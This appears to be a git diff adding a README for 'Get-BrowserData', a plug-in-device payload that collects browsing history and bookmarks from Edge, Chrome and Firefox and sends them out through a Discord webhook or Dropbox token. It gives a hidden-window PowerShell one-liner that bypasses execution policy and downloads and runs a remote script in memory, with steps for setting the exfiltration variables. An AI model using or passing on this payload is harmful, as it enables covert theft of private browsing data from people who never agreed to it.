diff --git a/Payloads/Browser-Data/README.md b/Payloads/Browser-Data/README.md
new file mode 100644
index 0000000..1d29ad7
--- /dev/null
+++ b/Payloads/Browser-Data/README.md
@@ -0,0 +1,89 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - The Function
+ - Contact
+ - Acknowledgments
+
+
+
+# Get-BrowserData
+
+
+
+
+
+
YouTube Tutorial
+
+
+## Description
+
+This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently)
+
+They are then exfiled using either discord or dropbox
+
+## The Function
+
+### [Get-BrowserData]
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* You no longer need to host your own version of this script
+* $db is the variable that holds your DropBox token
+* $dc is the variable that holds your Discord webhook
+* Fill in either variable or both to set your exfil method
+
+SYNTAX:
+
+```
+powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr | iex
+```
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [UberGuidoZ](https://github.com/UberGuidoZ)